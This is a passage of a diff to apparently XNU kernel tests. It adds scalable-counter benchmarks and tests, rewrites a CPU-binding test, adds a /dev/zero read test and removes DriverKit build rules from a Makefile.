+    modify_argparser = function(parser)
+        parser:argument{
+          name = 'path',
+          description = 'Path to benchmark binary'
+        }
+        parser:option{
+            name = '--cpu-workers',
+            description = 'Number of cpu workers'
+        }
+        parser:flag{
+          name = '--through-max-workers',
+          description = 'Run benchmark for [1..n] cpu workers'
+        }
+        parser:flag{
+          name = '--through-max-workers-fast',
+          description = 'Run benchmark for [1..2] and each power of four value in [4..n] cpu workers'
+        }
+        parser:option {
+            name = "--num-writes",
+            description = "number of writes",
+            default = kDefaultNumWrites
+        }
+        parser:option{
+            name = '--variant',
+            description = 'Which benchmark variant to run (scalable, atomic, or racy)',
+            default = 'scalable',
+            choices = {"scalable", "atomic", "racy"}
+        }
+    end
+}
+
+assert(benchmark.opt.path, "No path supplied for fault throughput binary")
+
+local ncpus, err = sysctl('hw.logicalcpu_max')
+assert(ncpus > 0, 'invalid number of logical cpus')
+local cpu_workers = tonumber(benchmark.opt.cpu_workers) or ncpus
+
+local writes_per_second = perfdata.unit.custom('writes/sec')
+local tests = {}
+
+function QueueTest(num_cores)
+    table.insert(tests, {
+        path = benchmark.opt.path,
+        num_cores = num_cores,
+    })
+end
+
+if benchmark.opt.through_max_workers then
+    for i = 1, cpu_workers do
+        QueueTest(i)
+    end
+elseif benchmark.opt.through_max_workers_fast then
+    local i = 1
+    while i <= cpu_workers do
+        QueueTest(i)
+        -- Always do a run with two threads to see what the first part of
+        -- the scaling curve looks like
+        -- (and to measure perf on dual core systems).
+        if i == 1 and cpu_workers >= 2 then
+            QueueTest(i + 1)
+        end
+        i = i * 4
+    end
+else
+    QueueTest(cpu_workers)
+end
+
+for _, test in ipairs(tests) do
+    local args = {test.path, benchmark.opt.variant, benchmark.opt.num_writes, test.num_cores,
+                     echo = true}
+    for out in benchmark:run(args) do
+        local result = out:match("-----Results-----\n(.*)")
+        benchmark:assert(result, "Unable to find result data in output")
+        local data = csv.openstring(result, {header = true})
+        for field in data:lines() do
+            for k, v in pairs(field) do
+                local unit = writes_per_second
+                local larger_better = true
+                if k == "loss" then
+                    unit = percentage
+                    larger_better = false
+                end
+                benchmark.writer:add_value(k, unit, tonumber(v), {
+                  [perfdata.larger_better] = larger_better,
+                  threads = test.num_cores,
+                  variant = benchmark.opt.variant
+                })
+            end
+        end
+    end
+end
+
+benchmark:finish()
diff --git a/tests/counter/common.c b/tests/counter/common.c
new file mode 100644 (file)
index 0000000..f759f29
--- /dev/null
@@ -0,0 +1,24 @@
+#include <sys/types.h>
+#include <sys/sysctl.h>
+#include <sys/kern_sysctl.h>
+
+#include "counter/common.h"
+
+int
+init_scalable_counter_test()
+{
+       kern_return_t result;
+       int value = 1;
+
+       result = sysctlbyname("kern.scalable_counter_test_start", NULL, NULL, &value, sizeof(value));
+       return result;
+}
+
+int
+fini_scalable_counter_test()
+{
+       kern_return_t result;
+       int value = 1;
+       result = sysctlbyname("kern.scalable_counter_test_finish", NULL, NULL, &value, sizeof(value));
+       return result;
+}
diff --git a/tests/counter/common.h b/tests/counter/common.h
new file mode 100644 (file)
index 0000000..eaf4daa
--- /dev/null
@@ -0,0 +1,7 @@
+#ifndef _COUNTER_COMMON_H
+#define _COUNTER_COMMON_H
+
+int init_scalable_counter_test(void);
+int fini_scalable_counter_test(void);
+
+#endif /* !defined(_COUNTER_COMMON_H) */
diff --git a/tests/counter/counter.c b/tests/counter/counter.c
new file mode 100644 (file)
index 0000000..8000b08
--- /dev/null
@@ -0,0 +1,181 @@
+#include <stdatomic.h>
+#include <sys/kern_sysctl.h>
+
+#include <darwintest_utils.h>
+#include <darwintest.h>
+
+#include "counter/common.h"
+#include "test_utils.h"
+
+static unsigned int ncpu(void);
+
+static uint64_t
+sysctl_read(const char *name)
+{
+       int result;
+       uint64_t value;
+       size_t size = sizeof(value);
+       result = sysctlbyname(name, &value, &size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(result, "Read from %s", name);
+       return value;
+}
+
+static void
+sysctl_write(const char* name, int64_t amount)
+{
+       kern_return_t result;
+       result = sysctlbyname(name, NULL, NULL, &amount, sizeof(int64_t));
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(result, "Write to %s", name);
+}
+
+static void
+scalable_counter_add(int64_t amount)
+{
+       sysctl_write("kern.scalable_counter_test_add", amount);
+}
+
+static void
+static_scalable_counter_add(int64_t amount)
+{
+       sysctl_write("kern.static_scalable_counter_test_add", amount);
+}
+
+static int64_t
+scalable_counter_load(void)
+{
+       return (int64_t) sysctl_read("kern.scalable_counter_test_load");
+}
+
+static int64_t
+static_scalable_counter_load(void)
+{
+       return (int64_t) sysctl_read("kern.static_scalable_counter_test_load");
+}
+
+/*
+ * A background thread that bangs on the percpu counter and then exits.
+ * @param num_iterations How many times to bang on the counter. Each iteration makes the counter
+ * bigger by 100.
+ */
+static void*
+background_scalable_counter_thread(void* num_iterations_ptr)
+{
+       int64_t i, num_iterations;
+       num_iterations = (int64_t)(num_iterations_ptr);
+       for (i = 0; i < num_iterations; i++) {
+               scalable_counter_add(-25);
+               scalable_counter_add(75);
+               scalable_counter_add(-100);
+               scalable_counter_add(150);
+       }
+       atomic_thread_fence(memory_order_release);
+       return 0;
+}
+
+static
+void
+darwin_test_fini_scalable_counter_test()
+{
+       int ret = fini_scalable_counter_test();
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "fini_scalable_counter_test");
+}
+
+static
+void
+darwin_test_setup(void)
+{
+       T_SETUPBEGIN;
+       int dev_kernel = is_development_kernel();
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(dev_kernel, "sysctlbyname kern.development");
+       if (is_development_kernel() != 1) {
+               T_SKIP("Skipping test on non development kernel.");
+       }
+       init_scalable_counter_test();
+       T_SETUPEND;
+       T_ATEND(darwin_test_fini_scalable_counter_test);
+}
+
+T_DECL(test_scalable_counters_single_threaded, "Test single threaded operations on scalable_counters", T_META_ASROOT(true))
+{
+       static int64_t kNumIterations = 100, i, expected_value = 0;
+       darwin_test_setup();
+       T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 0LL, "Counter starts at zero");
+
+       /* Simple add, subtract, and read */
+       scalable_counter_add(1);
+       T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 1LL, "0 + 1 == 1");
+       scalable_counter_add(-1);
+       T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 0LL, "1 - 1 == 0");
+       for (i = 0; i < kNumIterations; i++) {
+               scalable_counter_add(i);
+               expected_value += i;
+       }
+       for (i = 0; i < kNumIterations / 2; i++) {
+               scalable_counter_add(-i);
+               expected_value -= i;
+       }
+       T_QUIET; T_EXPECT_EQ(scalable_counter_load(), expected_value, "Counter value is correct.");
+       T_END;
+}
+
+T_DECL(test_static_counter, "Test staticly declared counter", T_META_ASROOT(true))
+{
+       static size_t kNumIterations = 100;
+       int64_t start_value;
+       darwin_test_setup();
+       start_value = static_scalable_counter_load();
+       for (size_t i = 0; i < kNumIterations; i++) {
+               static_scalable_counter_add(1);
+       }
+       T_QUIET; T_EXPECT_EQ(static_scalable_counter_load(), (long long) kNumIterations + start_value, "Counter value is correct");
+       T_END;
+}
+
+T_DECL(test_scalable_counters_multithreaded, "Test multi-threaded operations on scalable_counters", T_META_ASROOT(true))
+{
+       unsigned int kNumThreads = ncpu() * 5;
+       int ret;
+       int64_t i;
+       pthread_attr_t pthread_attr;
+       pthread_t *threads;
+
+       darwin_test_setup();
+
+       threads = malloc(sizeof(pthread_t) * kNumThreads);
+       T_QUIET; T_ASSERT_NOTNULL(threads, "Out of memory");
+
+       ret = pthread_attr_init(&pthread_attr);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_attr_init");
+
+       int64_t expected_value = 0;
+       for (i = 0; i < kNumThreads; i++) {
+               ret = pthread_create(&threads[i], &pthread_attr, background_scalable_counter_thread, (void*)(i));
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create");
+               expected_value += 100 * i;
+       }
+
+       for (i = 0; i < kNumThreads; i++) {
+               void *exit_code;
+               ret = pthread_join(threads[i], &exit_code);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_join");
+               T_QUIET; T_ASSERT_EQ((ptrdiff_t) exit_code, (ptrdiff_t) 0, "Background thread exited sucessfully.");
+       }
+       atomic_thread_fence(memory_order_acquire);
+
+       T_QUIET; T_EXPECT_EQ(scalable_counter_load(), expected_value, "Counter value is correct.");
+
+       ret = pthread_attr_destroy(&pthread_attr);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_attr_destroy");
+       free(threads);
+}
+
+static unsigned int
+ncpu()
+{
+       kern_return_t result;
+       int ncpu;
+       size_t size = sizeof(ncpu);
+       result = sysctlbyname("hw.ncpu", &ncpu, &size, NULL, 0);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(result, "hw.npu");
+       return (unsigned int) ncpu;
+}
index 24a2c156cb99d6c42262c66884d07c1f686d213c..0906ab7fc801edac90c76e5760feed438db332b8 100644 (file)
  * Test to validate that we can schedule threads on all hw.ncpus cores according to _os_cpu_number
  *
  * <rdar://problem/29545645>
+ * <rdar://problem/30445216>
  *
  *  xcrun -sdk macosx.internal clang -o cpucount cpucount.c -ldarwintest -g -Weverything
  *  xcrun -sdk iphoneos.internal clang -arch arm64 -o cpucount-ios cpucount.c -ldarwintest -g -Weverything
+ *  xcrun -sdk macosx.internal clang -o cpucount cpucount.c -ldarwintest -arch arm64e -Weverything
  */
 
 #include <darwintest.h>
 
 #include <stdio.h>
 #include <stdlib.h>
-#include <stdbool.h>
-#include <stdalign.h>
 #include <unistd.h>
-#include <assert.h>
 #include <pthread.h>
-#include <err.h>
-#include <errno.h>
-#include <sysexits.h>
 #include <sys/sysctl.h>
-#include <stdatomic.h>
+#include <sys/proc_info.h>
+#include <libproc.h>
 
 #include <mach/mach.h>
 #include <mach/mach_time.h>
 
 #include <os/tsd.h> /* private header for _os_cpu_number */
 
-T_GLOBAL_META(T_META_RUN_CONCURRENTLY(true));
+T_GLOBAL_META(
+       T_META_RUN_CONCURRENTLY(false),
+       T_META_BOOTARGS_SET("enable_skstb=1"),
+       T_META_CHECK_LEAKS(false),
+       T_META_ASROOT(true),
+       T_META_ALL_VALID_ARCHS(true)
+       );
 
-/* const variables aren't constants, but enums are */
-enum { max_threads = 40 };
+#define KERNEL_BOOTARGS_MAX_SIZE 1024
+static char kernel_bootargs[KERNEL_BOOTARGS_MAX_SIZE];
 
-#define CACHE_ALIGNED __attribute__((aligned(128)))
-
-static _Atomic CACHE_ALIGNED uint64_t g_ready_threads = 0;
-
-static _Atomic CACHE_ALIGNED bool g_cpu_seen[max_threads];
-
-static _Atomic CACHE_ALIGNED bool g_bail = false;
-
-static uint32_t g_threads; /* set by sysctl hw.ncpu */
-
-static uint64_t g_spin_ms = 50; /* it takes ~50ms of spinning for CLPC to deign to give us all cores */
-
-/*
- * sometimes pageout scan can eat all of CPU 0 long enough to fail the test,
- * so we run the test at RT priority
- */
-static uint32_t g_thread_pri = 97;
-
-/*
- * add in some extra low-pri threads to convince the amp scheduler to use E-cores consistently
- * works around <rdar://problem/29636191>
- */
-static uint32_t g_spin_threads = 2;
-static uint32_t g_spin_threads_pri = 20;
-
-static semaphore_t g_readysem, g_go_sem;
+#define KERNEL_VERSION_MAX_SIZE 1024
+static char kernel_version[KERNEL_VERSION_MAX_SIZE];
 
 static mach_timebase_info_data_t timebase_info;
 
 static uint64_t
-nanos_to_abs(uint64_t nanos)
+abs_to_nanos(uint64_t abs)
 {
-       return nanos * timebase_info.denom / timebase_info.numer;
+       return abs * timebase_info.numer / timebase_info.denom;
 }
 
-static void
-set_realtime(pthread_t thread)
-{
-       kern_return_t kr;
-       thread_time_constraint_policy_data_t pol;
-
-       mach_port_t target_thread = pthread_mach_thread_np(thread);
-       T_QUIET; T_ASSERT_NOTNULL(target_thread, "pthread_mach_thread_np");
-
-       /* 1s 100ms 10ms */
-       pol.period      = (uint32_t)nanos_to_abs(1000000000);
-       pol.constraint  = (uint32_t)nanos_to_abs(100000000);
-       pol.computation = (uint32_t)nanos_to_abs(10000000);
-
-       pol.preemptible = 0; /* Ignored by OS */
-       kr = thread_policy_set(target_thread, THREAD_TIME_CONSTRAINT_POLICY, (thread_policy_t) &pol,
-           THREAD_TIME_CONSTRAINT_POLICY_COUNT);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_policy_set(THREAD_TIME_CONSTRAINT_POLICY)");
-}
-
-static pthread_t
-create_thread(void *(*start_routine)(void *), uint32_t priority)
+static int32_t
+get_csw_count()
 {
+       struct proc_taskinfo taskinfo;
        int rv;
-       pthread_t new_thread;
-       pthread_attr_t attr;
-
-       struct sched_param param = { .sched_priority = (int)priority };
-
-       rv = pthread_attr_init(&attr);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_init");
-
-       rv = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_setdetachstate");
-
-       rv = pthread_attr_setschedparam(&attr, &param);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_setschedparam");
-
-       rv = pthread_create(&new_thread, &attr, start_routine, NULL);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_create");
-
-       if (priority == 97) {
-               set_realtime(new_thread);
-       }
 
-       rv = pthread_attr_destroy(&attr);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_destroy");
+       rv = proc_pidinfo(getpid(), PROC_PIDTASKINFO, 0, &taskinfo, sizeof(taskinfo));
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "PROC_PIDTASKINFO");
 
-       return new_thread;
+       return taskinfo.pti_csw;
 }
 
-static void *
-thread_fn(__unused void *arg)
+// noinline hopefully keeps the optimizer from hoisting it out of the loop
+// until rdar://68253516 is fixed.
+__attribute__((noinline))
+static uint32_t
+fixed_os_cpu_number(void)
 {
-       T_QUIET; T_EXPECT_TRUE(true, "initialize darwintest on this thread");
-
-       kern_return_t kr;
-
-       kr = semaphore_wait_signal(g_go_sem, g_readysem);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal");
+       uint32_t cpu_number = _os_cpu_number();
 
-       /* atomic inc to say hello */
-       g_ready_threads++;
+       return cpu_number;
+}
 
-       uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time();
 
-       /*
-        * spin to force the other threads to spread out across the cores
-        * may take some time if cores are masked and CLPC needs to warm up to unmask them
-        */
-       while (g_ready_threads < g_threads && mach_absolute_time() < timeout) {
-               ;
-       }
+T_DECL(count_cpus, "Tests we can schedule bound threads on all hw.ncpus cores and that _os_cpu_number matches")
+{
+       int rv;
 
-       T_QUIET; T_ASSERT_GE(timeout, mach_absolute_time(), "waiting for all threads took too long");
+       setvbuf(stdout, NULL, _IONBF, 0);
+       setvbuf(stderr, NULL, _IONBF, 0);
 
-       timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time();
+       /* Validate what kind of kernel we're on */
+       size_t kernel_version_size = sizeof(kernel_version);
+       rv = sysctlbyname("kern.version", kernel_version, &kernel_version_size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.version");
 
-       int iteration = 0;
-       uint32_t cpunum = 0;
+       T_LOG("kern.version: %s\n", kernel_version);
 
-       /* search for new CPUs for the duration */
-       while (mach_absolute_time() < timeout) {
-               cpunum = _os_cpu_number();
+       /* Double check that darwintest set the boot arg we requested */
+       size_t kernel_bootargs_size = sizeof(kernel_bootargs);
+       rv = sysctlbyname("kern.bootargs", kernel_bootargs, &kernel_bootargs_size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.bootargs");
 
-               assert(cpunum < max_threads);
+       T_LOG("kern.bootargs: %s\n", kernel_bootargs);
 
-               g_cpu_seen[cpunum] = true;
+       if (NULL == strstr(kernel_bootargs, "enable_skstb=1")) {
+               T_FAIL("enable_skstb=1 boot-arg is missing");
+       }
 
-               if (iteration++ % 10000) {
-                       uint32_t cpus_seen = 0;
+       kern_return_t kr;
+       kr = mach_timebase_info(&timebase_info);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_timebase_info");
 
-                       for (uint32_t i = 0; i < g_threads; i++) {
-                               if (g_cpu_seen[i]) {
-                                       cpus_seen++;
-                               }
-                       }
+       int bound_cpu_out = 0;
+       size_t bound_cpu_out_size = sizeof(bound_cpu_out);
+       rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0);
 
-                       /* bail out early if we saw all CPUs */
-                       if (cpus_seen == g_threads) {
-                               break;
-                       }
+       if (rv == -1) {
+               if (errno == ENOENT) {
+                       T_FAIL("kern.sched_thread_bind_cpu doesn't exist, must set enable_skstb=1 boot-arg on development kernel");
+               }
+               if (errno == EPERM) {
+                       T_FAIL("must run as root");
                }
        }
 
-       g_bail = true;
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu");
+       T_QUIET; T_ASSERT_EQ(bound_cpu_out, -1, "kern.sched_thread_bind_cpu should exist, start unbound");
 
-       printf("thread cpunum: %d\n", cpunum);
+       struct sched_param param = {.sched_priority = 63};
 
-       kr = semaphore_wait_signal(g_go_sem, g_readysem);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal");
+       rv = pthread_setschedparam(pthread_self(), SCHED_FIFO, &param);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_setschedparam");
 
-       return NULL;
-}
+       uint32_t sysctl_ncpu = 0;
+       size_t ncpu_size = sizeof(sysctl_ncpu);
+       rv = sysctlbyname("hw.ncpu", &sysctl_ncpu, &ncpu_size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "sysctlbyname(hw.ncpu)");
 
-static void *
-spin_fn(__unused void *arg)
-{
-       T_QUIET; T_EXPECT_TRUE(true, "initialize darwintest on this thread");
+       T_LOG("hw.ncpu: %2d\n", sysctl_ncpu);
 
-       kern_return_t kr;
+       T_ASSERT_GT(sysctl_ncpu, 0, "at least one CPU exists");
 
-       kr = semaphore_wait_signal(g_go_sem, g_readysem);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal");
+       for (uint32_t cpu_to_bind = 0; cpu_to_bind < sysctl_ncpu; cpu_to_bind++) {
+               int32_t before_csw_count = get_csw_count();
+               T_LOG("(csw %4d) attempting to bind to cpu %2d\n", before_csw_count, cpu_to_bind);
 
-       uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC * 2) + mach_absolute_time();
+               uint64_t start =  mach_absolute_time();
 
-       /*
-        * run and sleep a bit to force some scheduler churn to get all the cores active
-        * needed to work around bugs in the amp scheduler
-        */
-       while (mach_absolute_time() < timeout && g_bail == false) {
-               usleep(500);
+               rv = sysctlbyname("kern.sched_thread_bind_cpu", NULL, 0, &cpu_to_bind, sizeof(cpu_to_bind));
 
-               uint64_t inner_timeout = nanos_to_abs(1 * NSEC_PER_MSEC) + mach_absolute_time();
+               uint64_t end =  mach_absolute_time();
 
-               while (mach_absolute_time() < inner_timeout && g_bail == false) {
-                       ;
+               if (rv == -1 && errno == ENOTSUP) {
+                       T_SKIP("Binding is available, but this process doesn't support binding (e.g. Rosetta on Aruba)");
                }
-       }
 
-       kr = semaphore_wait_signal(g_go_sem, g_readysem);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal");
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.sched_thread_bind_cpu(%u)", cpu_to_bind);
 
-       return NULL;
-}
+               uint32_t os_cpu_number_reported = fixed_os_cpu_number();
 
+               bound_cpu_out = 0;
+               rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu");
 
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wgnu-flexible-array-initializer"
-T_DECL(count_cpus, "Tests we can schedule threads on all hw.ncpus cores according to _os_cpu_number",
-    T_META_CHECK_LEAKS(false), T_META_ENABLED(false))
-#pragma clang diagnostic pop
-{
-       setvbuf(stdout, NULL, _IONBF, 0);
-       setvbuf(stderr, NULL, _IONBF, 0);
+               T_QUIET; T_EXPECT_EQ((int)cpu_to_bind, bound_cpu_out,
+                   "should report bound cpu id matching requested bind target");
 
-       int rv;
-       kern_return_t kr;
-       kr = mach_timebase_info(&timebase_info);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_timebase_info");
-
-       kr = semaphore_create(mach_task_self(), &g_readysem, SYNC_POLICY_FIFO, 0);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_create");
-
-       kr = semaphore_create(mach_task_self(), &g_go_sem, SYNC_POLICY_FIFO, 0);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_create");
-
-       size_t ncpu_size = sizeof(g_threads);
-       rv = sysctlbyname("hw.ncpu", &g_threads, &ncpu_size, NULL, 0);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "sysctlbyname(hw.ncpu)");
-
-       printf("hw.ncpu: %2d\n", g_threads);
+               uint64_t delta_abs = end - start;
+               uint64_t delta_ns = abs_to_nanos(delta_abs);
 
-       assert(g_threads < max_threads);
+               int32_t after_csw_count = get_csw_count();
 
-       for (uint32_t i = 0; i < g_threads; i++) {
-               create_thread(&thread_fn, g_thread_pri);
-       }
-
-       for (uint32_t i = 0; i < g_spin_threads; i++) {
-               create_thread(&spin_fn, g_spin_threads_pri);
-       }
+               T_LOG("(csw %4d) bound to cpu %2d in %f milliseconds\n",
+                   after_csw_count, cpu_to_bind,
+                   ((double)delta_ns / 1000000.0));
 
-       for (uint32_t i = 0; i < g_threads + g_spin_threads; i++) {
-               kr = semaphore_wait(g_readysem);
-               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait");
-       }
+               if (cpu_to_bind > 0) {
+                       T_QUIET; T_EXPECT_LT(before_csw_count, after_csw_count,
+                           "should have had to context switch to execute the bind");
+               }
 
-       uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time();
+               T_LOG("cpu %2d reported id %2d\n",
+                   cpu_to_bind, os_cpu_number_reported);
 
-       /* spin to warm up CLPC :) */
-       while (mach_absolute_time() < timeout) {
-               ;
+               T_QUIET;
+               T_EXPECT_EQ(cpu_to_bind, os_cpu_number_reported,
+                   "should report same CPU number as was bound to");
        }
 
-       kr = semaphore_signal_all(g_go_sem);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_signal_all");
+       int unbind = -1; /* pass -1 in order to unbind the thread */
 
-       for (uint32_t i = 0; i < g_threads + g_spin_threads; i++) {
-               kr = semaphore_wait(g_readysem);
-               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait");
-       }
+       rv = sysctlbyname("kern.sched_thread_bind_cpu", NULL, 0, &unbind, sizeof(unbind));
 
-       uint32_t cpus_seen = 0;
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.sched_thread_bind_cpu(%u)", unbind);
 
-       for (uint32_t i = 0; i < g_threads; i++) {
-               if (g_cpu_seen[i]) {
-                       cpus_seen++;
-               }
+       rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0);
 
-               printf("cpu %2d: %d\n", i, g_cpu_seen[i]);
-       }
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu");
+       T_QUIET; T_ASSERT_EQ(bound_cpu_out, -1, "thread should be unbound at the end");
 
-       T_ASSERT_EQ(cpus_seen, g_threads, "test should have run threads on all CPUS");
+       T_PASS("test has run threads on all CPUS");
 }
index bb0411decd154ef6e604e8bff78c277f10ff4696..2688bdde440c28511ce2ca67cb24ddf10efc60ed 100644 (file)
@@ -1040,7 +1040,7 @@ apple_key_store(uint32_t command,
                input_struct_count, outputs, output_count, NULL, NULL
                );
        if (io_result != kIOReturnSuccess) {
-               T_LOG("%s: call to AppleKeyStore method %d failed", __func__);
+               T_LOG("%s: call to AppleKeyStore method %d failed", __func__, command);
                goto close;
        }
 
index 1e753f7f1d72b2e468cbff5226b01c5c0b587352..6005152eb5e5d00a07676f8261f3d7919ac14c41 100644 (file)
@@ -120,6 +120,8 @@ run_test(vm_address_t buffer_start, vm_address_t buffer_length)
 
 static size_t
 kern_memory_failure_handler(
+       __unused mach_port_t task,
+       __unused mach_port_t thread,
        exception_type_t exception,
        mach_exception_data_t code)
 {
diff --git a/tests/dev_zero.c b/tests/dev_zero.c
new file mode 100644 (file)
index 0000000..c355499
--- /dev/null
@@ -0,0 +1,29 @@
+#include <stdio.h>
+#include <fcntl.h>
+#include <util.h>
+#include <unistd.h>
+#include <darwintest.h>
+
+T_DECL(dev_zero,
+    "test reading from /dev/zero",
+    T_META_ASROOT(false))
+{
+       int dev = opendev("/dev/zero", O_RDONLY, NULL, NULL);
+       char buffer[100];
+
+       for (int i = 0; i < 100; i++) {
+               buffer[i] = 0xff;
+       }
+
+       int rd_sz = read(dev, buffer, sizeof(buffer));
+
+       T_EXPECT_EQ(rd_sz, 100, "read from /dev/zero failed");
+
+       for (int i = 0; i < 100; i++) {
+               if (buffer[i]) {
+                       T_FAIL("Unexpected non-zero character read from /dev/zero");
+               }
+       }
+
+       close(dev);
+}
index f58ffbd843cd9fddca2e994c19f799e384d4764e..987e08d5749005b35d15e379c32b8e5a933756b0 100644 (file)
-PROJECT := xnu/darwintests
-
 ifdef BASEDSTROOT
 override DSTROOT = $(BASEDSTROOT)
 endif
-INVALID_ARCHS = i386
-ENABLE_LTE_TESTS=YES
-
-OTHER_LTE_INCLUDE_FILES += \
-       /System/Library/PrivateFrameworks/LoggingSupport.framework, \
-       /System/Library/PrivateFrameworks/MobileKeyBag.framework, \
-       /System/Library/Frameworks/IOSurface.framework, \
-       /usr/local/lib/libdarwintest_utils.dylib, \
-       /usr/lib/libapple_crypto.dylib,
-
-DEVELOPER_DIR ?= $(shell xcode-select -p)
 
 # the xnu build system will only ever call us with the default target
 .DEFAULT_GOAL := install
 
-SDKROOT ?= driverkit.internal
-
-include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.common
-
-DRIVERKIT_DIR := $(TARGETSDK)/System/DriverKit
-DRIVERKIT_TARGET := x86_64-apple-driverkit$(shell xcrun --sdk driverkit.internal --show-sdk-version)
-
-IIG := $(shell xcrun --sdk "$(SDKROOT)" -f iig)
-
-# Enumerate all directories in this folder, excluding the "build" directory
-DEXT_SRCS = $(filter-out build,$(shell find . -type d -depth 1 | sed -e "s:./::g"))
-
-# hack: reuse the default CXXFLAGS and LDFLAGS but remove -mmacosx-version-min and -arch. Also adds a few other required flags
-# These are used for both iig and clang
-DEXT_SHARED_CXXFLAGS := $(filter-out -mmacosx-version-min=%, $(shell echo $(CXXFLAGS) $(OTHER_CXXFLAGS) | sed -e "s/-arch [a-zA-Z0-9_]*//g"))  -isystem$(DRIVERKIT_DIR)/usr/include -iframework$(DRIVERKIT_DIR)/System/Library/Frameworks -std=gnu++14
-
-# These are used just for clang
-DEXT_CXXFLAGS := $(DEXT_SHARED_CXXFLAGS) -target $(DRIVERKIT_TARGET)
-
-# These are used just for iig
-IIGFLAGS := -- $(DEXT_SHARED_CXXFLAGS) -D__IIG=1 -x c++
-
-# Used just for clang. LDFLAGS are not needed for iig
-DEXT_LDFLAGS := $(filter-out -mmacosx-version-min=%, $(shell echo $(LDFLAGS) $(OTHER_LDFLAGS) | sed -e "s/-arch [a-zA-Z0-9_]*//g")) -target $(DRIVERKIT_TARGET) -L$(DRIVERKIT_DIR)/usr/lib -F$(DRIVERKIT_DIR)/System/Library/Frameworks -framework DriverKit
+install:
+       mkdir -p $(DSTROOT)/AppleInternal
 
 
-# This generates rules to create dexts from each directory specified in DEXT_SRCS
-define GENERATE_DEXT_RULE
-## Given the following directory structure:
-##   test_driver_123/
-##     Info.plist
-##     test_driver_123.entitlements
-##     [cpp and iig files]
-## This produces a dext called com.apple.test_driver_123.dext:
-##   com.apple.test_driver_123.dext/
-##     com.apple.test_driver_123 [dext executable]
-##     Info.plist
-##     _CodeSignature/
-
-CUSTOM_TARGETS += com.apple.$1.dext
-
-com.apple.$1.dext : $(patsubst $1/%.cpp,$(OBJROOT)/$1/%.o,$(wildcard $1/*.cpp)) $(patsubst $1/%.iig,$(OBJROOT)/$1/DerivedSources/%.iig.o,$(wildcard $1/*.iig))
-       # Create bundle directory
-       mkdir -p $(SYMROOT)/$$@
-       # Link object files
-       $(CXX) $(DEXT_LDFLAGS) $$^ -o $(SYMROOT)/$$@/com.apple.$1
-       # Copy Info.plist and sign
-       cp $1/Info.plist $(SYMROOT)/$$@
-       codesign -vvv --force --sign - --entitlements $1/$1.entitlements --timestamp=none $(SYMROOT)/$$@
-
-install-com.apple.$1.dext: com.apple.$1.dext
-       mkdir -p $(INSTALLDIR)
-       cp -R $(SYMROOT)/com.apple.$1.dext $(INSTALLDIR)
-
-$(OBJROOT)/$1/DerivedSources/%.iig.o: $(OBJROOT)/$1/DerivedSources/%.iig.cpp
-       mkdir -p $(OBJROOT)/$1/DerivedSources
-       # Compile *.iig.cpp to object file
-       $(CXX) $(DEXT_CXXFLAGS) -I$1/ -I$(OBJROOT)/$1/DerivedSources -c $$^ -o $$@
-
